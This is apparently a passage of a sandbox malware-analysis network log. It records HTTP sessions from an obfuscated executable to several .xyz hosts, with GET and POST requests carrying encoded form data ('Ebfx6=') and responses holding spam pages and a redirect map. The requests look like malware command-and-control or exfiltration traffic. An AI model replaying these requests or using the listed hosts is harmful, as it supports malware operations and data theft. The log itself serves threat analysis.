                                                                Data Ascii: Ebfx6=GJG6iV6oNtwxR/LhQPQx53XsfpJlOq/k/kqKfD0CIr1OtPPrVXX1eFLUM1PQo/1gx6Kyv5/fSRvH21+j+S1i8NFrCQn2W3BatCanJMI4tgAsCRtrbovX+EyJv2Tjh8Lli257L4K03HCOBI2KqBIubz2eqngqOa+DVNtiEUSEzJBLnjzTevY8BpLauXtvuffnVSxFcbhUQhQz5u8+jZEKh/QW4a/o8LsAi+P+vHT0a+pZdllaDVUVrBsT+zwdYDvtVTvHmq8MdDGWk/2vuX49xbpFUPzgCoud+igtqniHwmfr4GuBzrrprBvBHSF3yFIQ4r9lbY5iV5OH0RvGbhJdQPAC3pfPXNPfSzzfEto59Vg+7K/Eqzm19NmZN+dpb4VRfhPOfXo4EiXRggtVdq5CIW8N3o8R/QETtHkZGboSDB8tj3FawI110W58gJtk+/iu2EULDZVP7UU8LkpXhIBUhDlqngvtttGCcLhzQU5Dl1PeEXKZlgBeotlJwwu7flrlj9oIX1Wgy8O0WhixLe38Rec+kOSKTvU5Jy4jwQQ/H6ooOjYlS5GtA25neAuU/q5kc3JtOEX+wSxnutHm79xY3NPAiTsWPqocX8e1zIVMKmLzSpivpTPDIQIS7CusKuEdPML9y8kD1PSpGO9FY3bELocziM0gbSKlYZvBhcIHErT1xrpBxShPWzze5iJGjnAa49Au+IBtKgADJfc193BpUPw8tBNSjc9mm9ya5bqpv6EHBIPBhYDc2JmgsKnObP3g+QfhI4D3gJDTp4oSBeaDGvhIScXisl6OQEBpSmZcf5auOLxBcXBP/zaJAAEkXzlx6M+HYZ/GFSp/DlGXRi3mNX2KOuUoDXLPFVqtzkJBMHMxoLihU92JKNZF1Pn52eg/w+3U2yCBamtIV8/SKPurzq1y+KI8DC8069jXhjDVv/xsqlCyERlUSxA+EOHtoK03nXZ1GrxuFV9YxJz7sb0nSxF6RgkuSCulAofVL6Q6Fn8dP9 [TRUNCATED]
                                                                Dec 9, 2024 08:45:51.466078997 CET190INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 09 Dec 2024 07:45:51 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: d404 Not Found0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.1249758103.249.106.91801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:45:52.758831978 CET531OUTGET /dnjw/?Ebfx6=LLuahgeFNd50MfmeR+YO4X7oQIpbAv675x2tVSlUIoVemPDFIi7IcWvJHwj84u5Zt+Ov/a/NakHy5HK7jRYViNkqfBLCVUFvihPDLt9byicPXxQNcd7bh2g=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.6822662.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:45:54.299120903 CET1236INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 09 Dec 2024 07:45:54 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Data Raw: 62 37 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6d 69 70 3d 22 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 [TRUNCATED]
                                                                Data Ascii: b7e3<!DOCTYPE html><html mip=""><head><meta charset="utf-8" /><meta name="applicable-device" content="pc,mobile" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0" /><link rel="shortcut icon" href="//www.6822662.xyz/favicon.ico" type="image/x-icon" /><title>&#20061;&#37325;&#29615;&#22856;-&#29992;&#25163;&#26426;&#24590;&#20040;&#30475;&#23707;&#22269;&#22823;&#29255;</title><meta name="keywords" content="&#20061;&#37325;&#29615;&#22856;" /><meta name="description" content="&#20061;&#37325;&#29615;&#22856;" /><link rel="stylesheet" type="text/css" href="https://c.mipcdn.com/static/v1/mip.css" /><link rel="stylesheet" type="text/css" href="http://www.6822662.xyz/template/news/mip05/css/style.css" /><link rel="stylesheet" href="http://www.6822662.xyz/template/news/mip05/css/fontawesome-all.min.css" /><style mip-cus [TRUNCATED]
                                                                Dec 9, 2024 08:45:54.299150944 CET1236INData Raw: 7d 20 2e 6d 31 35 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 7d 20 2e 68 65 61 66 65 72 79 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 33 33 33 3b 20 7d 20 2e 6e 61 76 20 6c 69 3a 68 6f 76 65 72
                                                                Data Ascii: } .m15{margin-bottom:15px;} .heaferys { background-color: #333333; } .nav li:hover>a { background-color: #838c92; } .nav li.active>a { background-color: #838c92; } .nav ul ul { background-color: #838c92; } .nav ul li:hover>ul { background-colo
                                                                Dec 9, 2024 08:45:54.299164057 CET1236INData Raw: 3b 20 7d 20 2e 6c 69 73 74 32 20 6c 69 2e 70 61 67 65 2d 69 74 65 6d 20 61 2c 2e 6c 69 73 74 20 6c 69 2e 70 61 67 65 2d 69 74 65 6d 20 61 7b 20 77 69 64 74 68 3a 20 35 32 70 78 3b 20 7d 20 2e 6c 69 73 74 20 6c 69 2e 70 61 67 65 2d 69 74 65 6d 7b
                                                                Data Ascii: ; } .list2 li.page-item a,.list li.page-item a{ width: 52px; } .list li.page-item{ display: inline-block; } .pagebar div.page-control{ margin:0 auto; text-align: center; }@media only screen and (max-width: 1180px){ .m_menu{top:0;bottom:0;right
                                                                Dec 9, 2024 08:45:54.299482107 CET672INData Raw: 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 39 39 39 3b 74 6f 70 3a 32 30 70 78 3b 6c 65 66 74 3a 31 32 70 78 7d 20 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69 20 73 70 61 6e 2e 6d 65 6e 75 5f 62 74 6e 3a 61 66 74 65 72 7b 74 72 61 6e 73
                                                                Data Ascii: ground-color:#999;top:20px;left:12px} .m_menu ul.menu li span.menu_btn:after{transform:rotate(90deg);-ms-transform:rotate(90deg);-moz-transform:rotate(90deg);-webkit-transform:rotate(90deg);-o-transform:rotate(90deg)} .m_menu ul.menu li span.m
                                                                Dec 9, 2024 08:45:54.299664974 CET1236INData Raw: 6e 74 3e 61 2c 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 3e 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 20 2e 6d 5f 6d 65 6e 75 20 75 6c 2e 6d 65 6e 75 20 6c 69 3a 68 6f 76 65 72 7b 62
                                                                Data Ascii: nt>a,.m_menu ul.menu li.current-menu-item>a{color:#fff} .m_menu ul.menu li:hover{background-color:rgba(0,0,0,0.2)} .m_menu ul.menu li:hover>a{color:#fff} .m_menu ul.menu li:hover>span.menu_btn:before,.m_menu ul.menu li:hover>span.menu_btn:afte
                                                                Dec 9, 2024 08:45:54.299675941 CET1236INData Raw: 22 63 65 62 36 65 36 22 3e 3c 2f 73 75 70 3e 3c 74 69 6d 65 20 64 72 6f 70 7a 6f 6e 65 3d 22 36 61 35 64 30 30 22 3e 3c 2f 74 69 6d 65 3e 3c 64 69 76 20 64 72 6f 70 7a 6f 6e 65 3d 22 64 64 36 33 62 64 22 20 69 64 3d 22 6d 6f 6e 61 76 62 65 72 22
                                                                Data Ascii: "ceb6e6"></sup><time dropzone="6a5d00"></time><div dropzone="dd63bd" id="monavber" class="edd63b nav heaferys" data-type="index" data-infoid=""><tt date-time="f918f3"></tt><var dir="b109f4"></var><area lang="f82d7a"></area><ul class="fbb3a4 na
                                                                Dec 9, 2024 08:45:54.299686909 CET1236INData Raw: 72 79 2d 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 36 38 32 32 36 36 32 2e 78 79 7a 2f 74 61 6f 6e 61 69 6d 75 78 69 61 6e 67 6e 61 69 2f 22 20 64 61 74 61 2d 74 79 70 65 3d 22 6d 69 70 22 20 64 61 74 61 2d 74 69 74 6c
                                                                Data Ascii: ry-2"><a href="http://www.6822662.xyz/taonaimuxiangnai/" data-type="mip" data-title="" title=""></a></li><li id="navbar-category-2"><a href="http://www.6822662.xyz/xiaotianyou/" data-type="mip" data
                                                                Dec 9, 2024 08:45:54.300338984 CET1236INData Raw: 67 32 32 22 3e 3c 62 64 6f 20 64 61 74 65 2d 74 69 6d 65 3d 22 32 32 39 39 32 35 22 3e 3c 2f 62 64 6f 3e 3c 64 66 6e 20 64 69 72 3d 22 63 33 63 31 37 35 22 3e 3c 2f 64 66 6e 3e 3c 66 6f 6e 74 20 6c 61 6e 67 3d 22 31 34 63 39 66 38 22 3e 3c 2f 66
                                                                Data Ascii: g22"><bdo date-time="229925"></bdo><dfn dir="c3c175"></dfn><font lang="14c9f8"></font><div dropzone="fe3bee" id="pt" class="n8a3bb bm cl"><ins draggable="43131b"></ins><small dropzone="65382a"></small><sup date-time="988116"></sup><div date-ti
                                                                Dec 9, 2024 08:45:54.300350904 CET1236INData Raw: 3c 68 31 3e e4 b9 9d e9 87 8d e7 8e af e5 a5 88 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 75 6c 3e 3c 6c 69 3e 3c 6d 61 70 20 64 69 72 3d 22 61 63 66 33 38 31 22 3e 3c 2f 6d 61 70 3e 3c 62 64 6f 20 6c 61 6e 67 3d 22 38 65 37 63 64 63 22 3e 3c 2f 62 64
                                                                Data Ascii: <h1></h1></div><ul><li><map dir="acf381"></map><bdo lang="8e7cdc"></bdo><dfn draggable="4f4a47"></dfn><div dir="1d08f0" class="u7ae15 img"><a href="http://www.6822662.xyz/Dating/149c599845.html" class="v7f84a item-link" data-type="
                                                                Dec 9, 2024 08:45:54.300363064 CET1236INData Raw: 5f 62 6c 61 6e 6b 22 3e 3c 69 20 63 6c 61 73 73 3d 22 79 32 66 61 63 65 20 66 61 20 66 61 2d 63 6f 6c 75 6d 6e 73 22 3e 3c 2f 69 3e e4 b9 9d e9 87 8d e7 8e af e5 a5 88 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d
                                                                Data Ascii: _blank"><i class="y2face fa fa-columns"></i></a></span><span><i class="zdbed7 fa fa-clock-o"></i>2024-12-09 15:38</span><span><i class="afd490 fa fa-eye"></i>2878</span><span><i class="b8b366 fa fa-tags"></i></span></div></div></li
                                                                Dec 9, 2024 08:45:54.418662071 CET1236INData Raw: e4 b8 80 e4 ba 9b e9 99 90 e5 88 b6 e3 80 82 e4 b8 89 e7 ba a7 e7 89 87 e7 9a 84 e5 88 b6 e4 bd 9c e5 92 8c e5 8f 91 e8 a1 8c e5 9c a8 e5 9b bd e9 99 85 e4 b8 8a e5 85 b6 e5 ae 9e 0d 2e 2e 2e 3c 2f 70 3e 3c 69 6e 73 20 64 69 72 3d 22 30 30 65 65
                                                                Data Ascii: ...</p><ins dir="00eef4"></ins><small lang="289dbb"></small><sup draggable="65c895"></sup><div dir="7f84a2" class="f398aa info"><span><a href="http://www.6822662.xyz/dnjw/" target="_


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.1249760121.43.155.35801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:46:00.463568926 CET805OUTPOST /404o/ HTTP/1.1
                                                                Host: www.lingdianyun29.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lingdianyun29.xyz
                                                                Referer: http://www.lingdianyun29.xyz/404o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 62 49 70 77 75 6a 78 48 31 6d 51 78 56 59 58 65 6a 49 35 69 64 78 78 65 65 74 70 61 57 4f 4e 53 6f 6b 49 67 62 43 39 38 43 35 78 51 63 33 47 46 31 6c 51 33 54 62 75 77 6e 4b 5a 55 34 2b 70 72 6d 42 41 39 58 30 48 41 56 6e 78 57 42 6f 78 7a 41 47 70 51 7a 4d 75 6c 39 35 53 35 62 64 52 54 45 33 44 7a 71 6b 6c 4a 77 70 38 49 36 57 30 4c 77 34 7a 41 73 56 42 46 32 46 35 53 31 37 78 53 4b 45 53 45 58 41 4d 36 30 2f 70 36 47 6b 76 51 6e 61 55 72 50 6e 45 36 46 68 48 2b 78 4a 72 30 33 56 46 42 36 50 76 73 33 79 48 64 6a 7a 55 4a 78 56 4c 69 46 35 30 6a 31 38 46 32 30 4e 6f 4e 54 67 3d 3d
                                                                Data Ascii: Ebfx6=bIpwujxH1mQxVYXejI5idxxeetpaWONSokIgbC98C5xQc3GF1lQ3TbuwnKZU4+prmBA9X0HAVnxWBoxzAGpQzMul95S5bdRTE3DzqklJwp8I6W0Lw4zAsVBF2F5S17xSKESEXAM60/p6GkvQnaUrPnE6FhH+xJr03VFB6Pvs3yHdjzUJxVLiF50j18F20NoNTg==
                                                                Dec 9, 2024 08:46:01.778703928 CET1236INHTTP/1.1 200 OK
                                                                Content-Type: text/html
                                                                Content-Length: 14605
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 76 61 72 20 6d 61 70 70 69 6e 67 73 20 3d 20 6e 65 77 20 4d 61 70 28 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 30 30 30 63 6c 6f 75 64 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 37 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html><head><script type="text/javascript">var mappings = new Map();mappings.set("www.0dianyun8.xyz", "https://0dyos.com");mappings.set("00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun07.top", "https://0dyos.com");mappings.set("lingdianyun4.xyz", "https://0dyos.com");mappings.set("www.00000cloud.top", "https://0dyos.com");mappings.set("lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun26.xyz", "https://0dyos.com");mappings.set("www.0dianyun17.xyz", "https://0dyos.com");mappings.set("www.0cloud2.top", "https://0dyos.com");mappings.set("www.lingdianyun19.top", "https://0dyos.com");mappings.set("lingdianyun39.top", "https://0dyos.com");mappings.set("lingdianyun16.xyz", "https://0dyos.com");mappings.set("www.0dianyun13.xyz", "https://0dyos.com");mappings.set("www.00dianyun3.xyz", "https://0dyos.com");mappings.set("lingdianyun25.xyz", "https://0dyos.com");mappings.set("www.lingdianyu [TRUNCATED]
                                                                Dec 9, 2024 08:46:01.778743982 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09
                                                                Data Ascii: ://0dyos.com");mappings.set("www.lingdianyun31.top", "https://0dyos.com");mappings.set("0dianyun3.xyz", "https://0dyos.com");mappings.set("0dy01.top", "https://0dyos.com");mappings.set("www.0dianyun3.xyz", "h
                                                                Dec 9, 2024 08:46:01.779495955 CET1236INData Raw: 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 64 69 61 6e 79 75 6e 31 30 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70
                                                                Data Ascii: ttps://0dyos.com");mappings.set("0dianyun10.xyz", "https://0dyos.com");mappings.set("0dianyun18.xyz", "https://0dyos.com");mappings.set("00dianyun2.xyz", "https://0dyos.com");mappings.set("0dianyun1.xyz", "https://0dyos.com");
                                                                Dec 9, 2024 08:46:01.779547930 CET224INData Raw: 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 31 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a
                                                                Data Ascii: "https://0dyos.com");mappings.set("www.0dianyun18.xyz", "https://0dyos.com");mappings.set("www.lingdianyun4.top", "https://0dyos.com");mappings.set("www.0dy123.xyz", "https://0dyos.com");mappings.set("www.0dy
                                                                Dec 9, 2024 08:46:01.780045033 CET1236INData Raw: 76 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 6c 69 6e 67 64 69 61 6e 79 75 6e 33 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30
                                                                Data Ascii: vs.xyz", "https://0dyos.com");mappings.set("www.lingdianyun31.xyz", "https://0dyos.com");mappings.set("lingdianyun18.top", "https://0dyos.com");mappings.set("lingdianyun21.xyz", "https://0dyos.com");mappings.set("www.lingdianyu
                                                                Dec 9, 2024 08:46:01.780138969 CET224INData Raw: 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f
                                                                Data Ascii: anyun8.xyz", "https://0dyos.com");mappings.set("00dianyun4.xyz", "https://0dyos.com");mappings.set("lingdianyun12.xyz", "https://0dyos.com");mappings.set("0dyvs.xyz", "https://0dyos.com");mappings.set("000dia
                                                                Dec 9, 2024 08:46:01.780667067 CET1236INData Raw: 6e 79 75 6e 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: nyun.top", "https://0dyos.com");mappings.set("lingdianyun24.xyz", "https://0dyos.com");mappings.set("www.lingdianyun30.xyz", "https://0dyos.com");mappings.set("lingdianyun28.top", "https://0dyos.com");mappings.set("www.0dy02.to
                                                                Dec 9, 2024 08:46:01.780755043 CET224INData Raw: 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 32 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70
                                                                Data Ascii: ://0dyos.com");mappings.set("lingdianyun02.xyz", "https://0dyos.com");mappings.set("lingdianyun23.xyz", "https://0dyos.com");mappings.set("www.00dianyun1.xyz", "https://0dyos.com");mappings.set("www.lingdiany
                                                                Dec 9, 2024 08:46:01.781383991 CET1236INData Raw: 75 6e 32 34 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 32 36 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79
                                                                Data Ascii: un24.top", "https://0dyos.com");mappings.set("lingdianyun26.top", "https://0dyos.com");mappings.set("www.0dyvs.top", "https://0dyos.com");mappings.set("www.lingdianyun20.top", "https://0dyos.com");mappings.set("www.lingdianyun1
                                                                Dec 9, 2024 08:46:01.781450987 CET224INData Raw: 67 73 2e 73 65 74 28 22 30 64 79 65 73 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 37 2e 78 79 7a 22 2c 20 22 68 74 74
                                                                Data Ascii: gs.set("0dyes.xyz", "https://0dyos.com");mappings.set("lingdianyun7.xyz", "https://0dyos.com");mappings.set("www.lingdianyun07.top", "https://0dyos.com");mappings.set("www.vdoos.com", "https://0dyos.com");map
                                                                Dec 9, 2024 08:46:01.898129940 CET1236INData Raw: 70 69 6e 67 73 2e 73 65 74 28 22 30 30 64 69 61 6e 79 75 6e 31 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 31 37 2e 74
                                                                Data Ascii: pings.set("00dianyun1.xyz", "https://0dyos.com");mappings.set("lingdianyun17.top", "https://0dyos.com");mappings.set("www.lingdianyun15.top", "https://0dyos.com");mappings.set("lingdianyun9.xyz", "https://0dyos.com");mappings.s


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.1249761121.43.155.35801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:46:03.132781029 CET825OUTPOST /404o/ HTTP/1.1
                                                                Host: www.lingdianyun29.xyz
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lingdianyun29.xyz
                                                                Referer: http://www.lingdianyun29.xyz/404o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 62 49 70 77 75 6a 78 48 31 6d 51 78 48 6f 48 65 77 37 52 69 66 52 78 66 62 74 70 61 42 65 4e 65 6f 6b 55 67 62 44 34 6b 44 50 5a 51 53 31 65 46 30 6b 51 33 51 62 75 77 76 71 5a 52 38 2b 70 30 6d 42 63 71 58 30 72 41 56 68 64 57 42 71 35 7a 63 6e 70 66 38 38 75 37 77 5a 53 2f 46 74 52 54 45 33 44 7a 71 6e 5a 6a 77 6f 59 49 36 6d 6b 4c 78 5a 7a 42 7a 6c 42 47 7a 46 35 53 2b 62 78 57 4b 45 53 71 58 43 34 55 30 35 31 36 47 6c 66 51 69 59 38 73 47 6e 46 78 42 68 48 74 6e 4b 65 63 6f 56 4a 34 77 63 44 74 71 79 62 38 69 31 5a 54 75 6e 44 30 51 36 67 75 34 72 38 47 35 4f 56 45 49 6c 66 39 39 73 41 6b 66 51 73 70 45 69 43 72 32 6a 71 30 6e 74 73 3d
                                                                Data Ascii: Ebfx6=bIpwujxH1mQxHoHew7RifRxfbtpaBeNeokUgbD4kDPZQS1eF0kQ3QbuwvqZR8+p0mBcqX0rAVhdWBq5zcnpf88u7wZS/FtRTE3DzqnZjwoYI6mkLxZzBzlBGzF5S+bxWKESqXC4U0516GlfQiY8sGnFxBhHtnKecoVJ4wcDtqyb8i1ZTunD0Q6gu4r8G5OVEIlf99sAkfQspEiCr2jq0nts=
                                                                Dec 9, 2024 08:46:04.485342979 CET1236INHTTP/1.1 200 OK
                                                                Content-Type: text/html
                                                                Content-Length: 14605
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 76 61 72 20 6d 61 70 70 69 6e 67 73 20 3d 20 6e 65 77 20 4d 61 70 28 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 77 77 77 2e 30 64 69 61 6e 79 75 6e 38 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 30 30 30 30 30 63 6c 6f 75 64 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 30 37 2e 74 6f 70 22 2c 20 22 68 74 74 70 73 3a 2f 2f 30 64 79 6f 73 2e 63 6f 6d 22 29 3b 0a 09 09 09 6d 61 70 70 69 6e 67 73 2e 73 65 74 28 22 6c 69 6e 67 64 69 61 6e 79 75 6e 34 2e 78 79 7a 22 2c 20 22 68 74 74 70 73 3a 